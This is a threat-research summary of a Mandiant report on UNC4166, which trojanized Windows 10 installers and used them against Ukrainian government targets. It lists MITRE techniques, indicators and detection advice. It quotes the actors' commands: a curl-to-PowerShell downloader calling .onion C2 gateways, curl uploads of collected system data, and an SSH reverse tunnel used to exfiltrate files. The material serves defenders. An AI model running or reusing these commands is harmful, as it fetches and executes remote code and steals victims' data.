Threat Research

Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government | Mandiant

GoogleCloudIntel

Mandiant describes a supply-chain operation (tracked as UNC4166) that trojanized Windows 10 ISO installers distributed via Ukrainian/Russian torrent sites; the ISOs modify scheduled tasks to run a PowerShell downloader that beacons to .onion C2 gateways and performs reconnaissance. Follow-on payloads observed include the SPAREPART service backdoor, BEACON (Cobalt Strike), and STOWAWAY, with exfiltration using HTTP(S)/TOR and SSH tunnels. #UNC4166 #SPAREPART

Keypoints

  • Trojanized Windows 10 ISO images (e.g., Win10_21H2_Ukrainian_x64.iso) were hosted on Ukrainian- and Russian-language torrent sites and configured to run malicious actions during setup.
  • The ISOs alter legitimate Windows scheduled tasks (GatherNetworkInfo, Consolidator) to add PowerShell downloader actions that use curl to contact .onion TOR gateway C2s and include the device UUID in request headers.
  • SetupComplete.cmd on the ISO disables telemetry, Windows updates and Microsoft services, blocks Microsoft domains/IPs, and contains activation/piracy scripts to modify system behavior and impair defenses.
  • Initial lightweight footholds (scheduled tasks executing PowerShell) performed targeted reconnaissance (exporting sysinfo, directory listings, geolocation) and exfiltrated data via curl to TOR C2s.
  • When targets were identified as high value, operators deployed additional backdoors: SPAREPART (Windows service DLL with randomized beacon timing), BEACON (Cobalt Strike), and STOWAWAY (public backdoor/proxy).
  • Operators used additional tooling and channels for data theft and redundancy — downloading TOR, running Sheret HTTP server locally and tunneling via localhost.run (SSH) to exfiltrate removable-drive files.

MITRE Techniques

  • [T1053.005] Scheduled Task/Job – The actor modified legitimate scheduled tasks (GatherNetworkInfo, Consolidator) to add a secondary action executing a PowerShell downloader (“Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H (‘h:’+(wmic csproduct get UUID)) | powershell.exe”)
  • [T1059.001] PowerShell – PowerShell is used to execute downloaded commands and perform on-host reconnaissance and exfiltration (“The altered tasks … executed a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell.”)
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – C2 and exfiltration used HTTP(S) via curl to .onion gateway URLs and cdnworld[.]org (“curl.exe -k https://ufowdauczwpa4…onion[.]moe … –data-binary ‘@sysinfo’ -k https://ufowdauczwpa4…onion[.]moe”)
  • [T1090] Proxy – Use of Tor gateways and tunneling (onion.moe/onion.ws) as proxying/C2 infrastructure (“The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws).”)
  • [T1543.003] Create or Modify System Process: Windows Service – Deployment of SPAREPART as a Windows service (“service named ‘Microsoft Delivery Network’ was created to execute %SYSTEM32%MicrosoftDeliveryNetworkMicrosoftDeliveryCenter …”)
  • [T1105] Ingress Tool Transfer – Tools and installers were downloaded to victims (TOR bundle.zip, BEACON/STOWAWAY payloads) from C2 or internet hosts (“bundle.zip … Downloaded from https://ufowdaucz…onion[.]moe/bundle.zip”)
  • [T1562.001] Disable or Modify Security Tools – SetupComplete.cmd disables telemetry, Windows updates, and blocks Microsoft services/domains to reduce detection (“The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services”)
  • [T1041] Exfiltration Over C2 Channel – Collected system and directory data exported to sysinfo and uploaded via curl to C2 (.onion) (“curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary ‘@sysinfo’ -k https://ufowdaucz…onion[.]moe”)

Indicators of Compromise

  • [File name / ISO] Trojanized Windows installer – Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)
  • [File hashes] Malware binaries – MicrosoftDeliveryCenter (SPAREPART) MD5 f9cd5b145e372553dded92628db038d8; AzureSettingSync.dll (BEACON) MD5 59a3129b73ba4756582ab67939a2fe3c
  • [File hashes] STOWAWAY binaries – C:WindowsSystem32splwow86.exe MD5 0f06afbb4a2a389e82de6214590b312b; %LOCALAPPDATA%SODUsvc.exe MD5 a8e7d8ec0f450037441ee43f593ffc7c
  • [Domains / Onion C2s] Primary TOR gateway C2s – ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe, 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe
  • [Domains] BEACON C2 domains – https://cdnworld[.]org/34192–general-feedback/… , https://cdnworld[.]org/34702–general/sync/… (used by AzureSettingSync.dll)
  • [IPs] STOWAWAY C2 IPs – 193.142.30[.]166:443, 91.205.230[.]66:8443
  • [Paths / Scheduled tasks] Trojanized scheduled tasks and persistence – C:WindowsSystem32TasksMicrosoftWindowsNetTraceGatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf), C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)

Mandiant’s forensic analysis shows the infection chain begins with a trojanized Windows 10 ISO (example: Win10_21H2_Ukrainian_x64.iso, MD5 b7a0cd8…) that contains an added SetupComplete.cmd and modified Windows scheduled task files. The ISO alters the legitimate GatherNetworkInfo and Consolidator scheduled tasks to add a secondary action which runs curl to retrieve tasking and pipes it to PowerShell; example command lines observed include “curl.exe -k https://ufowdaucz…onion[.]moe -H (‘h:’+(wmic csproduct get UUID)) | powershell.exe” and similar curl uploads using “–data-binary ‘@sysinfo’”. SetupComplete.cmd bundles public scripts to disable Windows telemetry and updates, block Microsoft domains/IPs, disable OneDrive, and run activation steps, which facilitates stealth and impedes normal security telemetry.

Post-compromise triage uses the scheduled-task PowerShell bootstrap to enumerate system info and file listings (Get-ComputerInfo, Get-ChildItem exports to sysinfo then optional compression) and to exfiltrate via HTTP(S) to TOR gateway C2s. If a device is judged valuable, operators deploy additional tools: SPAREPART (a Windows service DLL “MicrosoftDeliveryCenter” that reads the device UUID via GetSystemFirmwareTable, randomizes beacon timing, uses WinHTTP with a hardcoded Firefox user-agent to GET tasking, and pipes returned commands to powershell.exe), BEACON (dropped as AzureSettingSync.dll contacting cdnworld[.]org), and STOWAWAY (compiled binaries connecting to IPs 193.142.30.166:443 and 91.205.230.66:8443). Operators also staged ingress tools (TOR installer bundle.zip) and used Sheret plus SSH tunneling to localhost.run for interactive file serving and exfiltration of removable-drive files (ssh -R 80:localhost:80 -i defaultssh localhost[.]run …).

Key detection artifacts and procedures: inspect modified scheduled tasks under C:WindowsSystem32Tasks (notably GatherNetworkInfo and Consolidator), search for SetupComplete.cmd variants and the ISO MD5 and malware MD5s listed above, look for PowerShell invocations that call curl.exe to .onion[.]moe/.onion[.]ws addresses with a header built from “wmic csproduct get UUID”, and watch for new services named like “Microsoft Delivery Network” executing MicrosoftDeliveryCenter. Network detection should flag connections to the listed .onion gateway proxies, cdnworld[.]org BEACON endpoints, and the STOWAWAY IPs; hunting queries should also capture exports to sysinfo/sysinfo.zip and use of Sheret/localhost.run SSH tunnels.

Read more: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint